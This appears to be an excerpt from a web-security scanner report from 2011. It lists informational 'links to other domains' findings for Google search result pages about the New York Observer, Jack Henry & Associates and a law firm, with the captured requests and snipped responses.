<h3 class="r"><a href="http://www.observer.com/channel/real-estate/" class=l onmousedown="return rwt(this,'','','','2','AFQjCNHKQENPm4Rk6EocDQIL8jTbui8_ug','','0CDsQFjAB')">Real Estate | The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:PXOFi8FwAjQJ:www.observer.com/channel/real-estate/+New+York+Observer&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNEMrkn9cEOqUnYfTUAyGhzKOmAghQ','','0CD4QIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.observer.com/channel/media/" class=l onmousedown="return rwt(this,'','','','3','AFQjCNEcgw_7YcMVZZr3Wlyc0tkzryQsJA','','0CD8QFjAC')">Media | The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:CvVQstfzBVcJ:www.observer.com/channel/media/+New+York+Observer&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNG9jIW1B--ktIdOuN2wcL10l-NBtA','','0CEEQIDAC')">Cached</a>
...[SNIP]...
<li class=g><a href="http://www.theatlanticwire.com/entertainment/2011/07/Cathie-blacks-alleged/40242/" class=l onmousedown="return rwt(this,'','','','4','AFQjCNFB1-xx1UxX4uWDwFtnEBcsmhjRXA','','0CEQQqQIwAw')">Cathie Black's Car Crash; Sotomayor Talks Chicken</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/The_New_York_Observer" class=l onmousedown="return rwt(this,'','','','7','AFQjCNHBcfULV3DOd6ECJmqSMe9jOKrllg','','0CEwQFjAG')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:92SHVesqVNQJ:en.wikipedia.org/wiki/The_New_York_Observer+New+York+Observer&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','7','AFQjCNEpQneavopKsLoT_5jxUcN9a2LPvg','','0CE4QIDAG')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.politickerny.com/2011/06/27/gillibrand-hopes-for-some-momentum-from-marriage-bill/" class=l onmousedown="return rwt(this,'','','','8','AFQjCNGVl-0RNU_t5XtlOKVSPscHoXcuzg','','0CFAQFjAH')">Gillibrand Hopes For Some Momentum from Marriage Bill | PolitickerNY</a>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:IcGUCkkbuE8J:www.politickerny.com/2011/06/27/gillibrand-hopes-for-some-momentum-from-marriage-bill/+New+York+Observer&cd=8&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','8','AFQjCNH_IfqZy7rSbVUBx7zGSzcOu98tXw','','0CFIQIDAH')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://mediamatters.org/blog/201107200012" class=l onmousedown="return rwt(this,'','','','9','AFQjCNHO3gxJ5REzK67-6LUZtnurqSkABw','','0CFMQFjAI')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:nAsVBGlwGJQJ:mediamatters.org/blog/201107200012+New+York+Observer&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','9','AFQjCNG1xXD8YhiIBQRNoPyl-d8NmPkM5A','','0CFcQIDAI')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://wordpress.org/showcase/the-new-york-observer/" class=l onmousedown="return rwt(this,'','','','10','AFQjCNEcojrssjtlVg1UIKAfBDZIf8a-xQ','','0CFgQFjAJ')">WordPress ... Showcase .. The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:L2Tq_kCKRlEJ:wordpress.org/showcase/the-new-york-observer/+New+York+Observer&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','10','AFQjCNGss_CMeVCBgIeqAfFX__ZBgEDCVw','','0CFoQIDAJ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html" class=l onmousedown="return rwt(this,'','','','11','AFQjCNGgbCcFUzfjsSSJ0Y60zUrrdnwP4A','','0CFsQFjAK')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:v4CqNjEvVTcJ:topics.nytimes.com/topics/reference/timestopics/organizations/n/new_york_observer/index.html+New+York+Observer&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','11','AFQjCNEpvg8krPcf3fe055L9al7AQnbWjw','','0CGEQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.amazon.com/The-New-York-Observer/dp/B00005NIP2" class=l onmousedown="return rwt(this,'','','','12','AFQjCNFmOxVbBsoj73xY0iCPLzgVj2W9Zg','','0CGMQFjAL')">The <em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:LMRAWPGdIP4J:www.amazon.com/The-New-York-Observer/dp/B00005NIP2+New+York+Observer&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','12','AFQjCNEJxQkHSDJvtLKugOzWBzEds9c8dQ','','0CGkQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://ma.tt/2011/06/new-york-observer/" class=l onmousedown="return rwt(this,'','','','13','AFQjCNGkEePrjevQWB2OSS5At8gyjYQwkQ','','0CGsQFjAM')"><em>
...[SNIP]...
<span class=gl><a href="http://webcache.googleusercontent.com/search?q=cache:9KS5nnSr20sJ:ma.tt/2011/06/new-york-observer/+New+York+Observer&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','13','AFQjCNGseRBC0QF515NOSiML7NROKj5gWA','','0CG0QIDAM')">Cached</a>
...[SNIP]...
<div><a href="http://nymag.com/" class=l onmousedown="return rwt(this,'','','','14','AFQjCNEi9gBUXjGRnsmmGzmkIl9XnLYn4g','','0CG8QoggwDQ')">New York Magazine</a>
...[SNIP]...
<div><a href="http://www.villagevoice.com/" class=l onmousedown="return rwt(this,'','','','15','AFQjCNFXvvzgJoKUpgTadoLawo07P6cIAg','','0CHEQoggwDg')">Village Voice</a>
...[SNIP]...
<div><a href="http://www.newyorker.com/" class=l onmousedown="return rwt(this,'','','','16','AFQjCNGx-p9UrGOHDOoi8ulrv9TdLR_AFA','','0CHMQoggwDw')">The New Yorker</a>
...[SNIP]...
<div><a href="http://observer.guardian.co.uk/" class=l onmousedown="return rwt(this,'','','','17','AFQjCNHxqWDgcSwd-huVR5Qeckk0komOvQ','','0CHUQoggwEA')">The Observer</a>
...[SNIP]...

18.169. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?hl=en&q=Jack+Henry+&+Associates

The response contains the following links to other domains:

http://en.wikipedia.org/wiki/Jack_Henry
http://finance.yahoo.com/q?s=JKHY
http://jkhy.client.shareholder.com/
http://webcache.googleusercontent.com/search?q=cache:5cSTqD_ynrsJ:jkhy.client.shareholder.com/+Jack+Henry&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:BD0oseJdoicJ:www.jackhenry.com/clientslogin+Jack+Henry&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Bxfgw9WvFa0J:www.jackhenry.com/%3FP%3D4fc1d089-10b0-4cd1-8e4c-9c6efcd85686+Jack+Henry&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:Ilh0BpgsbWAJ:www.jackhenryartist.com/+Jack+Henry&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:kyVIpyxlIJwJ:en.wikipedia.org/wiki/Jack_Henry+Jack+Henry&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:nlUPINR_1vcJ:www.jackhenry.com/Default.aspx%3FP%3Dda026b0d-c70d-4395-9e3f-fdbf44656bf9+Jack+Henry&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:peM-mCwGRREJ:www.jackhenry.net/+Jack+Henry&cd=15&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:qII2A7__uw4J:www.jackhenry.com/+Jack+Henry&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:qxnuKUSlQWkJ:finance.yahoo.com/q%3Fs%3DJKHY+Jack+Henry&cd=16&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:sPrSWeON3ysJ:https://jackhenry.ats.hrsmart.com/cgi-bin/a/searchjobs_quick.cgi+Jack+Henry&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.jackhenry.com/
http://www.jackhenry.com/?P=4fc1d089-10b0-4cd1-8e4c-9c6efcd85686
http://www.jackhenry.com/?P=789f3b04-5eb6-4fbd-ad76-2d01161249a2
http://www.jackhenry.com/?P=9235c51f-ff8e-4c3a-be27-a4392cbc1835
http://www.jackhenry.com/Default.aspx?P=79ee2c45-1aa3-4fa0-8676-8ec9ffd2be66
http://www.jackhenry.com/Default.aspx?P=c7f88865-8eb0-488a-bf73-b81f2728129d
http://www.jackhenry.com/Default.aspx?P=da026b0d-c70d-4395-9e3f-fdbf44656bf9
http://www.jackhenry.com/clientslogin
http://www.jackhenry.net/
http://www.jackhenryartist.com/
http://www.youtube.com/results?hl=en&q=Jack+Henry&+Associates=&um=1&ie=UTF-8&sa=N&tab=w1
https://jackhenry.ats.hrsmart.com/cgi-bin/a/searchjobs_quick.cgi
https://www.jackhenry.com/Default.aspx?P=e9991ade-602e-4172-83c8-ed6ad3390cf9

Request

GET /search?hl=en&q=Jack+Henry+&+Associates HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=hF3sNFzNDiZMKMwt0WZVsaf-tISuy02NG32GFzcjWjmHZDjyHO4cH85LuW7T8eHtFsOa_-uBcVgFtj8eePDVp7JiXpDa_p72IxDR6LUJuVTSf2YVSO5Uj8_SPahG4RWl

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:00:33 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 142707

<!doctype html> <head> <title>Jack Henry - Google Search</title> <script>window.google={kEI:"UXcoTvDABsK10AHA8tzjCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,29702,29859,30316,304
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?hl=en&q=Jack+Henry&+Associates=&um=1&ie=UTF-8&sa=N&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jackhenry.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNHG1cqvhrqN52I3_10ygLfKaNEmbQ','','0CC8QFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:qII2A7__uw4J:www.jackhenry.com/+Jack+Henry&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNESGF1xdQ1dbx6Zvwtyk6efyjsnhA','','0CDQQIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jackhenry.com/Default.aspx?P=da026b0d-c70d-4395-9e3f-fdbf44656bf9" onmousedown="return rwt(this,'','','','1','AFQjCNEtuHNlsjtUglhbVeeAvT42ZsPM2w','','0CDcQqwMoADAA')">For Prospective Employees</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jackhenry.com/?P=789f3b04-5eb6-4fbd-ad76-2d01161249a2" onmousedown="return rwt(this,'','','','1','AFQjCNHYJY2LQHHE24UHU0qiW-vvdYLfaQ','','0CDgQqwMoATAA')">Contact Us</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jackhenry.com/?P=4fc1d089-10b0-4cd1-8e4c-9c6efcd85686" onmousedown="return rwt(this,'','','','1','AFQjCNFgRiL7l6_7DgPyM9ukxT_TGWwfkw','','0CDkQqwMoAjAA')">About Us</a></div><div class=sld><a class=sla href="http://www.jackhenry.com/clientslogin" onmousedown="return rwt(this,'','','','1','AFQjCNFp30q1uoAqXknpJ5uCaJ2mRzuUjw','','0CDoQqwMoAzAA')">For Clients</a>
...[SNIP]...
<div class=sld><a class=sla href="https://www.jackhenry.com/Default.aspx?P=e9991ade-602e-4172-83c8-ed6ad3390cf9" onmousedown="return rwt(this,'','','','1','AFQjCNGUx90RPXUY8hsF4UpeKhs5DPbMWA','','0CDsQqwMoBDAA')">Products & Services</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jackhenry.com/Default.aspx?P=c7f88865-8eb0-488a-bf73-b81f2728129d" onmousedown="return rwt(this,'','','','1','AFQjCNHtvcJoeOFLOBDiIsM-1MYRoMbtLw','','0CDwQqwMoBTAA')">Events</a></div><div class=sld><a class=sla href="http://www.jackhenry.com/Default.aspx?P=79ee2c45-1aa3-4fa0-8676-8ec9ffd2be66" onmousedown="return rwt(this,'','','','1','AFQjCNEH2b_AQCeJEKBdAO7BXDrdL71qug','','0CD0QqwMoBjAA')">Resource Center</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.jackhenry.com/?P=9235c51f-ff8e-4c3a-be27-a4392cbc1835" onmousedown="return rwt(this,'','','','1','AFQjCNGiR2WRO8Lbf0_JtNPlHIncGPYJmg','','0CD4QqwMoBzAA')">News</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jackhenry.com/Default.aspx?P=da026b0d-c70d-4395-9e3f-fdbf44656bf9" class=l onmousedown="return rwt(this,'','','','2','AFQjCNEtuHNlsjtUglhbVeeAvT42ZsPM2w','','0CEEQFjAB')">For Prospective Employees - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:nlUPINR_1vcJ:www.jackhenry.com/Default.aspx%3FP%3Dda026b0d-c70d-4395-9e3f-fdbf44656bf9+Jack+Henry&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNHGXQvgVh4KnlFQOpX-nGGO5_tFkw','','0CEYQIDAB')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jackhenry.com/?P=4fc1d089-10b0-4cd1-8e4c-9c6efcd85686" class=l onmousedown="return rwt(this,'','','','3','AFQjCNFgRiL7l6_7DgPyM9ukxT_TGWwfkw','','0CEgQFjAC')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Bxfgw9WvFa0J:www.jackhenry.com/%3FP%3D4fc1d089-10b0-4cd1-8e4c-9c6efcd85686+Jack+Henry&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','3','AFQjCNGdDY_bu8yHqSlhp-fZXo4uEpTSqA','','0CE0QIDAC')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jackhenry.com/clientslogin" class=l onmousedown="return rwt(this,'','','','4','AFQjCNFp30q1uoAqXknpJ5uCaJ2mRzuUjw','','0CE8QFjAD')">For Clients - <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:BD0oseJdoicJ:www.jackhenry.com/clientslogin+Jack+Henry&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','4','AFQjCNHG8Q5f8tspXkEAn6pJLF_MTu17ew','','0CFQQIDAD')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://jkhy.client.shareholder.com/" class=l onmousedown="return rwt(this,'','','','11','AFQjCNFnlc9zqlxaqM9sAX9oj3Bzktolfg','','0CGwQFjAK')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:5cSTqD_ynrsJ:jkhy.client.shareholder.com/+Jack+Henry&cd=11&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','11','AFQjCNFnMGaUJmKvvuY6-7gyoLREeRLrjA','','0CHEQIDAK')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jackhenryartist.com/" class=l onmousedown="return rwt(this,'','','','12','AFQjCNGhtOEc3MErVEIq4MDdI1Jc74L0IA','','0CHIQFjAL')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:Ilh0BpgsbWAJ:www.jackhenryartist.com/+Jack+Henry&cd=12&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','12','AFQjCNGPYY_SqWVk2BTVucKy-9xN3XouEQ','','0CHcQIDAL')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://en.wikipedia.org/wiki/Jack_Henry" class=l onmousedown="return rwt(this,'','','','13','AFQjCNF-XhCplFzzHqXhcyl8xto7xL03Ig','','0CHkQFjAM')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:kyVIpyxlIJwJ:en.wikipedia.org/wiki/Jack_Henry+Jack+Henry&cd=13&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','13','AFQjCNFYdnpJS_i4fh3ty2c_8ajdypbuCg','','0CH4QIDAM')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="https://jackhenry.ats.hrsmart.com/cgi-bin/a/searchjobs_quick.cgi" class=l onmousedown="return rwt(this,'','','','14','AFQjCNGuWVW6P0gcpd0ksRPBW83QdznrEA','','0CIABEBYwDQ')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:sPrSWeON3ysJ:https://jackhenry.ats.hrsmart.com/cgi-bin/a/searchjobs_quick.cgi+Jack+Henry&cd=14&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','14','AFQjCNFLyeI5iEZ5lMQxQATjvKfA050B-Q','','0CIUBECAwDQ')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://www.jackhenry.net/" class=l onmousedown="return rwt(this,'','','','15','AFQjCNHGfHDGW-8XWbzeNFTloHGi9XrkWw','','0CIcBEBYwDg')">Security Training Corporation</a>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:peM-mCwGRREJ:www.jackhenry.net/+Jack+Henry&cd=15&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','15','AFQjCNHScy37Gy-vHcHKWBBCuqk8uTa11g','','0CIwBECAwDg')">Cached</a>
...[SNIP]...
<h3 class="r"><a href="http://finance.yahoo.com/q?s=JKHY" class=l onmousedown="return rwt(this,'','','','16','AFQjCNGqjGcrmc0Wt_P4bhAqMTxucys4eg','','0CI4BEBYwDw')">JKHY: Summary for <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:qxnuKUSlQWkJ:finance.yahoo.com/q%3Fs%3DJKHY+Jack+Henry&cd=16&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','16','AFQjCNFBxF0SXdR6siFk4yd2RIva0nxKlA','','0CJMBECAwDw')">Cached</a>
...[SNIP]...

18.170. http://www.google.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.google.com
Path:	/search

Issue detail

The page was loaded from a URL containing a query string:

http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Norris+McLaughlin+and+Marcus

The response contains the following links to other domains:

http://probatelitigation.typepad.com/files/whitney-houston-counterclaim.pdf
http://webcache.googleusercontent.com/search?q=cache:1RzHcbOZ2-oJ:www.lawyers.com/New-York/New-York/Norris-McLaughlin-and-Marcus,-P.A.-A-Professional-Corporation-441815-f.html+Norris+McLaughlin+and+Marcus&cd=7&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:AnQVWbDXdLoJ:www.linkedin.com/company/norris-mclaughlin-%26-marcus+Norris+McLaughlin+and+Marcus&cd=6&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:C6UNjnfORhwJ:www.nmmlaw.com/+Norris+McLaughlin+and+Marcus&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:E8p-bBdIctsJ:www.martindale.com/Norris-McLaughlin-Marcus-PA/1122171-law-firm-office.htm+Norris+McLaughlin+and+Marcus&cd=5&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:EPt12xMcIQAJ:www.nmmlaw.com/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D501%26Itemid%3D56+Norris+McLaughlin+and+Marcus&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:NJBT8-dvFGwJ:www.uniset.ca/lloydata/css/331F3d406.htm+Norris+McLaughlin+and+Marcus&cd=10&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:o20gGlPA3KAJ:www.nmmlaw.com/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D97%26Itemid%3D29+Norris+McLaughlin+and+Marcus&cd=4&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:wTxT1LsIQqgJ:www.superlawyers.com/new-jersey/lawfirm/Norris-McLaughlin-and-Marcus-PA/19762a0c-3ee4-4a57-9275-2f5c63695cae.html+Norris+McLaughlin+and+Marcus&cd=9&hl=en&ct=clnk&gl=us&source=www.google.com
http://webcache.googleusercontent.com/search?q=cache:ydGCxRmlUHoJ:www.nmmlaw.com/index.php%3Foption%3Dcom_google%26view%3Dadvanced%26id%3D1%26Itemid%3D34+Norris+McLaughlin+and+Marcus&cd=3&hl=en&ct=clnk&gl=us&source=www.google.com
http://www.greenbaumlaw.com/
http://www.lawyers.com/New-York/New-York/Norris-McLaughlin-and-Marcus,-P.A.-A-Professional-Corporation-441815-f.html
http://www.linkedin.com/company/norris-mclaughlin-&-marcus
http://www.martindale.com/Norris-McLaughlin-Marcus-PA/1122171-law-firm-office.htm
http://www.mdmlaw.com/
http://www.nmmlaw.com/
http://www.nmmlaw.com/index.php?option=com_content&task=view&id=350&Itemid=44
http://www.nmmlaw.com/index.php?option=com_content&task=view&id=351&Itemid=45
http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56
http://www.nmmlaw.com/index.php?option=com_content&task=view&id=97&Itemid=29
http://www.nmmlaw.com/index.php?option=com_content&view=category&id=14&Itemid=33
http://www.nmmlaw.com/index.php?option=com_content&view=category&id=38&Itemid=47
http://www.nmmlaw.com/index.php?option=com_content&view=section&id=10&Itemid=29
http://www.nmmlaw.com/index.php?option=com_content&view=section&id=6&Itemid=28
http://www.nmmlaw.com/index.php?option=com_google&view=advanced&id=1&Itemid=34
http://www.riker.com/
http://www.sillscummis.com/
http://www.superlawyers.com/new-jersey/lawfirm/Norris-McLaughlin-and-Marcus-PA/19762a0c-3ee4-4a57-9275-2f5c63695cae.html
http://www.uniset.ca/lloydata/css/331F3d406.htm
http://www.youtube.com/results?q=Norris+McLaughlin+and+Marcus&um=1&ie=UTF-8&sa=N&hl=en&tab=w1

Request

GET /search?sourceid=chrome&ie=UTF-8&q=Norris+McLaughlin+and+Marcus HTTP/1.1
Host: www.google.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=381be2a5a4e321de:U=17ea5243225a615b:FF=0:TM=1305295666:LM=1306388828:GM=1:S=c4JmgYF7VRiR-ADW; NID=49=W8r0AKxd5wk5CX1jyfDbNGqu0gNP9tvrFwquFIFVcdigP0YfOxWLbqIT-uh0HQif4kRtxM0Zmnl6hxXO7elxBhi5M5Shuv0bLm6MSaba7TZWWydFwvwYYpn2fEzjfe3s

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 12:19:28 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Get-Dictionary: /sdch/StnTz5pY.dct
Server: gws
X-XSS-Protection: 1; mode=block
Content-Length: 99583

<!doctype html> <head> <title>Norris McLaughlin and Marcus - Google Search</title> <script>window.google={kEI:"ULwqTrzuF-fh0QGkpcDYCg",kEXPI:"17259,23756,24692,24878,24879,27400,28505,28936,297
...[SNIP]...
<li class=gbmtc><a onclick=gbar.qs(this) class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?q=Norris+McLaughlin+and+Marcus&um=1&ie=UTF-8&sa=N&hl=en&tab=w1">YouTube</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nmmlaw.com/" class=l onmousedown="return rwt(this,'','','','1','AFQjCNG7dHIXbK7Lv13Kqz9Vas4sYomiqQ','','0CBkQFjAA')"><em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:C6UNjnfORhwJ:www.nmmlaw.com/+Norris+McLaughlin+and+Marcus&cd=1&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','1','AFQjCNFgSgO3v-J6kPbr1RyoxqMWKNy5uQ','','0CB4QIDAA')">Cached</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56" onmousedown="return rwt(this,'','','','1','AFQjCNGp383ovIDc1Yhu7zre07Rc4PHmkg','','0CCAQqwMoADAA')">Professionals</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_google&view=advanced&id=1&Itemid=34" onmousedown="return rwt(this,'','','','1','AFQjCNFM63GMFmvNW5Nqo-jjTTnyHb5jZg','','0CCEQqwMoATAA')">Contact</a></div><div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&view=section&id=10&Itemid=29" onmousedown="return rwt(this,'','','','1','AFQjCNFvXKKfqPw5ub_cQB8aqkEt-tvaLw','','0CCIQqwMoAjAA')">Join Our Team</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&view=category&id=14&Itemid=33" onmousedown="return rwt(this,'','','','1','AFQjCNEOY5v1YFWFC8fCZHZ1cqaTa5jUMg','','0CCMQqwMoAzAA')">Areas of Practice</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&view=category&id=38&Itemid=47" onmousedown="return rwt(this,'','','','1','AFQjCNG_-4k7-4lhriZU45-DXCe4ivxRpw','','0CCQQqwMoBDAA')">Upcoming Events</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&task=view&id=350&Itemid=44" onmousedown="return rwt(this,'','','','1','AFQjCNFLirczPNDgmAMroWLkDXKMuWwK8Q','','0CCUQqwMoBTAA')">Lawyer Group Servicing Middle ...</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&task=view&id=351&Itemid=45" onmousedown="return rwt(this,'','','','1','AFQjCNFr46evEt2TwRsKbycZPuYmdZZFAA','','0CCYQqwMoBjAA')">Lawyers Serving large and global ...</a>
...[SNIP]...
<div class=sld><a class=sla href="http://www.nmmlaw.com/index.php?option=com_content&view=section&id=6&Itemid=28" onmousedown="return rwt(this,'','','','1','AFQjCNHpa4LVvBBb1bkWdiB1Vv4OmXPyCA','','0CCcQqwMoBzAA')">Articles</a>
...[SNIP]...
<h3 class="r"><a href="http://www.nmmlaw.com/index.php?option=com_content&task=view&id=501&Itemid=56" class=l onmousedown="return rwt(this,'','','','2','AFQjCNGp383ovIDc1Yhu7zre07Rc4PHmkg','','0CCoQFjAB')">Lawyers ... NJ, NY, PA Offices ... <em>
...[SNIP]...
<span class=gl> - <a href="http://webcache.googleusercontent.com/search?q=cache:EPt12xMcIQAJ:www.nmmlaw.com/index.php%3Foption%3Dcom_content%26task%3Dview%26id%3D501%26Itemid%3D56+Norris+McLaughlin+and+Marcus&cd=2&hl=en&ct=clnk&gl=us&source=www.google.com" onmousedown="return rwt(this,'','','','2','AFQjCNG4CdjE2NtApboxxhYMzVbJHqcq4Q','','0CC8QIDAB')">Cached</a>
...[SNIP]...
